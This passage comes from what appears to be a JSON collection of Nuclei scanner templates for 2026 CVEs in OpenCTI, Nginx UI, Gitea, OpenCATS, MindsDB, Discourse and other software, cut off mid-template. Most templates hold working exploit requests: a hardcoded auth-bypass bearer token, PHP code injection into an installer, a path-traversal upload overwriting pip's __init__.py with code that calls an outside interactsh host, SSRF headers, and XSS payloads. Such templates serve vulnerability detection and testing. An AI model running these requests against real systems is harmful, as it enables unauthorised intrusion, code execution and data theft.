CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-27960\n    epss-score: 0.01995\n    epss-percentile: 0.79807\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: opencti\n    product: opencti\n  tags: cve,cve2026,opencti,auth-bypass,unauth,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /graphql HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer 88ec0c6a-13ce-5e39-b486-354fe4a7084f\n\n        {\"query\":\"{ me { user_email name } }\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"user_email\", \"\\\"me\\\"\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: json\n        part: body\n        json:\n          - '.data.me.user_email'\n# digest: 4a0a00473045022100b77ceecaaac0b0ff03fb8ab8e109eb8a81d4a0380517f1e78e078be077a9cc6d022011cd8b4d25d948180f40b1e6132179c7c67fae20444ff60f7feeb48ab1c50d54:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-27960.yaml","vuln_id":"cve-2026-27960"},{"raw":"id: CVE-2026-27944\n\ninfo:\n  name: Nginx UI < 2.3.3 - Information Disclosure\n  author: omarkurt\n  severity: critical\n  description: |\n    Nginx UI < 2.3.3 contains an information disclosure vulnerability caused by unauthenticated access to /api/backup endpoint exposing encryption keys in X-Backup-Security header, letting unauthenticated attackers download and decrypt full system backups.\n  impact: |\n    Unauthenticated attackers can access and decrypt full system backups, exposing sensitive data including credentials and private keys.\n  remediation: |\n    Upgrade to version 2.3.3 or later.\n  reference:\n    - https://github.com/advisories/GHSA-g9w5-qffc-6762\n    - https://www.tenable.com/security/research/tra-2026-17\n    - https://vulnerabletarget.com/VT-2026-27944\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-27944\n    epss-score: 0.22162\n    epss-percentile: 0.97564\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: 0xjacky\n    product: nginx-ui\n    shodan-query: http.title:\"nginx ui\"\n    fofa-query: title=\"nginx ui\"\n  tags: cve,cve2026,nginx-ui,unauth,exposure,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/backup\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"X-Backup-Security\"\n          - \"application/zip\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"attachment; filename=\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: header\n        group: 1\n        name: backup_security_header\n        regex:\n          - \"X-Backup-Security: (.+)\"\n# digest: 4a0a00473045022100b936648fb9e6d9fb7e402e121e6321b4c5ebcdee55765fefd9fe05a0d73b584302207d3d03c911c7e2926f6eefed2e1b20f11f7968b71b1c53201067a57b6ced2fe9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-27944.yaml","vuln_id":"cve-2026-27944"},{"raw":"id: CVE-2026-27833\n\ninfo:\n  name: Piwigo < 16.3.0 - Unauthenticated Information Disclosure via History API\n  author: 0x_Akoko\n  severity: high\n  description: |\n   Piwigo <= 16.3.0 contains an information disclosure vulnerability caused by the pwg.history.search API method lacking admin_only restriction, letting unauthenticated users access full browsing history, exploit requires no authentication\n  impact: |\n   Unauthenticated attackers can access full browsing history of all gallery visitors, exposing sensitive user activity data.\n  remediation: |\n    Update to version 16.3.0 or later.\n  reference:\n    - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-397m-gfhm-pmg2\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27833\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-27833\n    epss-score: 0.01641\n    epss-percentile: 0.75348\n    cwe-id: CWE-862\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: piwigo\n    product: piwigo\n    fofa-query: icon_hash==\"540706145\"\n  tags: cve,cve2026,piwigo,exposure,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /ws.php?method=pwg.history.search&format=json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"stat\\\":\\\"ok\\\"\", \"\\\"result\\\"\", \"\\\"lines\\\"\")'\n          - 'contains_any(body, \"\\\"USERNAME\\\"\", \"\\\"NB_LINES\\\"\", \"\\\"GUESTS\\\"\")'\n        condition: and\n# digest: 4b0a00483046022100a977c1bee822e721228c003e7717871684b5a6b9ce3b015c106a82782fe35590022100a10ba274c67a3c5e89c8b25afa752d497b7126b4953e3924fdc00da8e6f71c70:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-27833.yaml","vuln_id":"cve-2026-27833"},{"raw":"id: CVE-2026-27826\n\ninfo:\n  name: mcp-atlassian < 0.17.0 - Server-Side Request Forgery\n  author: eyangfeng88-arch\n  severity: high\n  description: |\n   MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.\n  impact: |\n   Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.\n  remediation: |\n   Upgrade to version 0.17.0 or later.\n  reference:\n    - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/\n    - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9\n    - https://github.com/sooperset/mcp-atlassian/pull/986\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27826\n  classification:\n    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n    cvss-score: 8.2\n    cve-id: CVE-2026-27826\n    epss-score: 0.13632\n    epss-percentile: 0.96304\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: sooperset\n    product: mcp-atlassian\n    shodan-query: http.html:\"Atlassian MCP\"\n    fofa-query: body=\"Atlassian MCP\" || header=\"mcp-session-id\"\n  tags: cve,cve2026,mcp,atlassian,ssrf,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json, text/event-stream\n\n        {\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2024-11-05\",\"capabilities\":{},\"clientInfo\":{\"name\":\"nuclei\",\"version\":\"1.0\"}}}\n\n    extractors:\n      - type: regex\n        name: session_id\n        part: header\n        internal: true\n        group: 1\n        regex:\n          - '(?i)Mcp-Session-Id:\\s*([a-f0-9]+)'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'len(session_id) > 0'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json, text/event-stream\n        Mcp-Session-Id: {{session_id}}\n        X-Atlassian-Jira-Url: http://{{interactsh-url}}\n        X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test\n\n        {\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\"params\":{\"name\":\"jira_get_issue\",\"arguments\":{\"issue_key\":\"TEST-1\"}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100b971c6ecd98ae6dd3b46e5f0979789c18d76be948f844566d8366a2c28cf5550022100ce9ddf767a87a60e901a6958d364d511ddd812f0afec90112b14127578924bda:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-27826.yaml","vuln_id":"cve-2026-27826"},{"raw":"id: CVE-2026-27796\n\ninfo:\n  name: Homarr < 1.54.0 - Information Disclosure\n  author: str4k3r\n  severity: medium\n  description: |\n    Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access sensitive integration metadata, potentially exposing internal service details.\n  remediation: |\n    Update to version 1.54.0 or later.\n  reference:\n    - https://github.com/homarr-labs/homarr/security/advisories/GHSA-m4vc-4prp-cvp7\n    - https://github.com/homarr-labs/homarr/commit/91fc5a5c747121475a50f2713d571ceb89e95257\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27796\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-27796\n    epss-score: 0.01154\n    epss-percentile: 0.65593\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: homarr-labs\n    product: homarr\n    fofa-query: title=\"Homarr\"\n    shodan-query: http.title:\"Homarr\"\n  tags: cve,cve2026,homarr,exposure,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/trpc/integration.all\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - '\"result\":{\"data\":{\"json\":'\n          - '\"kind\":\"'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"UNAUTHORIZED\"\n        negative: true\n# digest: 4b0a00483046022100a97173c1a610d11f194d71f586db964d94493d895da25098fd54d5354890f9ff02210097e051ce7275073359cbb490322ee7e4875aad7bb3d38f87f48af3820bdcf611:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-27796.yaml","vuln_id":"cve-2026-27796"},{"raw":"id: CVE-2026-27771\n\ninfo:\n  name: Gitea Container Registry - Unauthorized Private Image Access\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Gitea < 1.26.2 allows unauthenticated remote attackers to pull private container images.The /v2/token endpoint grants anonymous ghost tokens (UserID:-1) with no scope restriction.The ReqContainerAccess middleware does not check package owner visibility, so ghost users can enumerate all container repositories via /_catalog and pull any private image layer.\n  impact: |\n    Unauthenticated attackers can exfiltrate proprietary application source code, embedded secrets (API keys, database credentials, cloud provider keys), and internal infrastructure configuration from private container images.\n  remediation: |\n    Upgrade to Gitea >= 1.26.2. As a temporary workaround, set REQUIRE_SIGNIN_VIEW=true in gitea app.ini, though this blocks all anonymous access including public repos.\n  reference:\n    - https://blog.gitea.com/release-of-1.26.2/\n    - https://github.com/go-gitea/gitea/pull/37290\n    - https://github.com/go-gitea/gitea/pull/37610\n    - https://orca.security/resources/blog/gitea-container-registry-vulnerability/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-27771\n    epss-score: 0.01393\n    epss-percentile: 0.71163\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: gitea\n    product: gitea\n    shodan-query: http.html:\"Gitea\"\n    fofa-query: app=\"Gitea\"\n  tags: cve,cve2026,gitea,container,registry,auth-bypass,unauth\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /v2/ HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n        internal: true\n\n  - raw:\n      - |\n        GET /v2/token?service=container_registry&scope=* HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        regex:\n          - '\"token\":\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        GET /v2/_catalog HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Accept: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"repositories\"'\n\n      - type: regex\n        part: body\n        regex:\n          - '\"repositories\":\\s*\\[\".+'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - '\"repositories\":\\s*(\\[.*\\])'\n# digest: 490a0046304402204da16340fa4ca4b79f814d79c90ec146ac893f6d000ff59a9f19b3f551091eb6022019d494e80d1a2d9d9e77c3e867324e98bb4308260efb0705e58606a0adc1aed8:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-27771.yaml","vuln_id":"cve-2026-27771"},{"raw":"id: CVE-2026-27760\n\ninfo:\n  name: OpenCATS - Command Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise.\n  remediation: |\n    Update to the version after commit 3002a29 or latest available version.\n  reference:\n    - https://chocapikk.com/posts/2026/opencats-installer-rce/\n    - https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6\n    - https://github.com/opencats/OpenCATS\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27760\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2026-27760\n    epss-score: 0.34629\n    epss-percentile: 0.98349\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: opencats\n    product: opencats\n    shodan-query:\n      - title:\"opencats\"\n      - http.title:\"opencats\"\n    fofa-query: title=\"opencats\"\n    google-query: intitle:\"opencats\"\n  tags: cve,cve2026,opencats,rce,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"!contains(body, 'installLocked')\"\n          - \"contains(body, 'setActiveStep')\"\n          - \"status_code == 200\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        user=cats');echo+'{{randstr}}'.md5('{{randstr}}');//\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n        internal: true\n\n  - raw:\n      - |\n        GET /index.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body, '{{randstr}}' + md5('{{randstr}}'))\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a0047304502205bc89468536306a95f2c76fcb4a4e18d6edde5c9538e0d991aba9a8bbc5d57d9022100a2974193cbe98627bc54bc8a7243f5712b4ec92f7b941e6aeacac7c12351ae77:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-27760.yaml","vuln_id":"cve-2026-27760"},{"raw":"id: CVE-2026-27645\n\ninfo:\n  name: Changedetection.io RSS Single Watch - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    changedetection.io < 0.54.1 contains a stored XSS caused by unescaped reflection of UUID path parameter in RSS single-watch endpoint, letting remote attackers execute JavaScript in victim's browser, exploit requires victim to visit crafted URL.\n  impact: |\n    Attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks\n  remediation: |\n    Update to version 0.54.1 or later.\n  reference:\n    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-mw8m-398g-h89w\n    - https://github.com/dgtlmoon/changedetection.io/commit/a385c89abf44b52fcfa20c7c6a6dd3047c4c1eb5\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27645\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-27645\n    cwe-id: CWE-79\n    epss-score: 0.00445\n    epss-percentile: 0.38129\n  metadata:\n    max-request: 2\n    verified: true\n    fofa-query: title=\"Change Detection\"\n    shodan-query: http.title:\"Change Detection\"\n  tags: cve,cve2026,xss,changedetection,rss\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"rss?token=\", \"Change Detection\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: rss_token\n        part: body\n        group: 1\n        regex:\n          - 'rss\\?token=([a-f0-9]{16,64})'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 404'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains_all(body, \"<img src=x onerror=alert(document.domain)>\", \"Watch with UUID\")'\n        condition: and\n# digest: 490a0046304402201b7361999512d39a4132d139d4ab65bec7066b5b4f930f906ef7c3b00bbbd99802204a8b565cee156bd062001f12176a201ca6e4a39cc166e477debd65be407e9010:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-27645.yaml","vuln_id":"cve-2026-27645"},{"raw":"id: CVE-2026-27542\n\ninfo:\n  name: WooCommerce Wholesale Lead Capture <= 2.0.3.1 - Unauthenticated Privilege Escalation\n  author: theamanrawat,pdresearch\n  severity: critical\n  description: |\n    Rymera Web Co Pty Ltd. Woocommerce Wholesale Lead Capture <= 2.0.3.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.\n  impact: |\n    Attackers can escalate their privileges, potentially gaining unauthorized access to restricted functions or data.\n  remediation: |\n    Update to the latest version beyond 2.0.3.1.\n  reference:\n    - https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540-\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-wholesale-lead-capture\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27542\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-27542\n    epss-score: 0.01737\n    epss-percentile: 0.76694\n    cwe-id: CWE-266\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: rymera-web-co\n    product: woocommerce-wholesale-lead-capture\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/woocommerce-wholesale-lead-capture/\"\n    shodan-query: http.html:\"/wp-content/plugins/woocommerce-wholesale-lead-capture/\"\n    publicwww-query: \"/wp-content/plugins/woocommerce-wholesale-lead-capture/\"\n  tags: cve,cve2026,wp,wordpress,woocommerce,wholesale,privesc,unauth,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/woocommerce-wholesale-lead-capture/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WooCommerce Wholesale Lead Capture\")'\n          - 'compare_versions(version, \"<= 2.0.3.1\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?m)Stable tag:\\s+([0-9]+\\.[0-9]+(?:\\.[0-9]+(?:\\.[0-9]+)*)?)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wwlc_create_user\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - '!regex(\"^(-1|0)\\\\s*$\", body) && len(body) > 2'\n          - 'contains_all(body, \"wwlc_firstname\", \"wwlc_email\")'\n        condition: and\n# digest: 4a0a004730450220448c92ad77f794653c4c681a0d982990598d938fa3aff373d519128ff5e99af9022100d451682f37629e54463584e558a33717da66311f19768eab2dd755a8c85db583:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-27542.yaml","vuln_id":"cve-2026-27542"},{"raw":"id: CVE-2026-27483\n\ninfo:\n  name: MindsDB - Remote Code Execution\n  author: thewhiteh4t\n  severity: high\n  description: |\n    MindsDB < 25.9.1.1 contains a remote code execution caused by path traversal in the /api/files upload file module, letting authenticated attackers write arbitrary files and execute commands, exploit requires authentication.\n  impact: |\n    Authenticated attackers can execute arbitrary commands remotely by writing files to arbitrary paths on the server.\n  remediation: |\n    Upgrade to version 25.9.1.1 or later.\n  reference:\n    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq\n    - https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef\n    - https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27483\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-27483\n    epss-score: 0.11113\n    epss-percentile: 0.95738\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: MindsDB\n    product: MindsDB\n    shodan-query: http.title:\"MindsDB\"\n  tags: cve,cve2026,mindsdb,path-traversal,rce,oast,intrusive,unauth\n\nvariables:\n  token: \"\"\n  username: \"\"\n  password: \"\"\n  filename: \"{{randstr}}\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/status\"\n\n    extractors:\n      - type: regex\n        name: mindsdb_version\n        part: body\n        group: 1\n        regex:\n          - '\"mindsdb_version\":\\s*\"([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+)'\n        internal: true\n\n      - type: regex\n        name: http_auth_enabled\n        part: body\n        group: 1\n        regex:\n          - '\"http_auth_enabled\":\\s*(true|false)'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"mindsdb_version\")'\n          - 'compare_versions(mindsdb_version, \">= 25.4.1.0\", \"< 25.9.1.1\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 && contains(body, \"token\")'\n          - 'status_code == 400 && contains(body, \"Error in username or password\")'\n        condition: or\n        internal: true\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        regex:\n          - '{\"token\":\\s*\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        PUT /api/files/{{filename}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9\n        Authorization: Bearer {{token}}\n        Connection: close\n\n        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9\n        Content-Disposition: form-data; name=\"name\"\n\n        {{filename}}\n        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9\n        Content-Disposition: form-data; name=\"source\"\n\n        {{filename}}\n        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9\n        Content-Disposition: form-data; name=\"source_type\"\n\n        file\n        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9\n        Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py\"\n        Content-Type: text/plain\n\n        import urllib.request\n        urllib.request.urlopen('http://{{interactsh-url}}')\n        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains(body, \"Not supported format\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/handlers/anomaly_detection/install HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains(body, \"Failed to install dependencies\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/status\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"mindsdb_version\"\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4a0a00473045022100c152bfe5baf8af0155a3ccba05f528e052c89aed3b54f841099f816a909296ab02207f18fb7d26db52af3685ec67927f658fc06caea37dd8c1acd3497acd49ae7409:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-27483.yaml","vuln_id":"cve-2026-27483"},{"raw":"id: CVE-2026-27454\n\ninfo:\n  name: Discourse <=2026.2.0 - Hidden Post Revision Disclosure via revert_to Authorization Bypass\n  author: str4k3r\n  severity: medium\n  description: |\n    Discourse versions before 2026.1.2, 2026.2.1, and 2026.3.0-latest.1 contain an authorization bypass in PostsController#display_post. The controller calls post.revert_to(params[:version]) directly whenever a version query parameter is present, without checking whether the corresponding PostRevision is hidden or whether the caller has permission to view edit history. By requesting a post at its publicly known version number via GET /posts/:id.json?version=<public_version>, the next PostRevision's stored modifications are applied unconditionally. If staff have hidden that revision, its pre-edit content is returned to an unauthenticated caller. On patched installs the same request is rejected with 403 because guardian.ensure_can_see!(post_revision) is evaluated first.\n  impact: |\n    An unauthenticated visitor can retrieve the contents of a hidden post revision that moderators intended to conceal from public viewers.\n  remediation: |\n    Upgrade Discourse to 2026.1.2, 2026.2.1, 2026.3.0-latest.1, or later.\n  reference:\n    - https://github.com/discourse/discourse/security/advisories/GHSA-fq69-f929-wp96\n    - https://github.com/discourse/discourse/commit/8510fde30eb0d7f2dee822a95f6cf43b9ac943d0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27454\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-27454\n    epss-score: 0.00893\n    epss-percentile: 0.57929\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: discourse\n    product: discourse\n  tags: cve,cve2026,discourse,idor,exposure,unauth\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /posts.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"latest_posts\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: post_id\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"latest_posts\":\\[\\{\"id\":(\\d+)'\n\n  - raw:\n      - |\n        GET /posts/{{post_id}}.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"\\\"version\\\"\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: pub_version\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"version\":(\\d+)'\n\n  - raw:\n      - |\n        GET /posts/{{post_id}}.json?version={{pub_version}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - '!contains(body, \"invalid_access\")'\n          - 'contains(body, \"\\\"cooked\\\"\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450221008edb9e473dc6617dfa70d5fba51a1b3be588e88f4fd5627a567213045c84cbbb02203b0b5ff08f4db1c8effc4b361d961925b16b0ad250d6d8fdafb731ad3dd4b809:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-27454.yaml","vuln_id":"cve-2026-27454"},{"raw":"id: CVE-2026-27176\n\ninfo:\n  name: MajorDoMo - Cross-Site Scripting\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    MajorDoMo contains a reflected XSS caused by unsanitized $qry parameter in command.php, letting attackers inject arbitrary JavaScript via crafted URLs, exploit requires victim to visit malicious URL.\n  impact: |\n    Attackers can execute arbitrary JavaScript in victim's browser, leading to session hijacking or other client-side attacks.\n  remediation: |\n    Sanitize the $qry parameter using htmlspecialchars() or equivalent before rendering.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27176\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-27176\n    epss-score: 0.00449\n    epss-percentile: 0.38434\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"majordomo\"\n  tags: cve,cve2026,xss,majordomo\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/command.php?qry=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"><img src=x onerror=alert(document.domain)>'\n          - 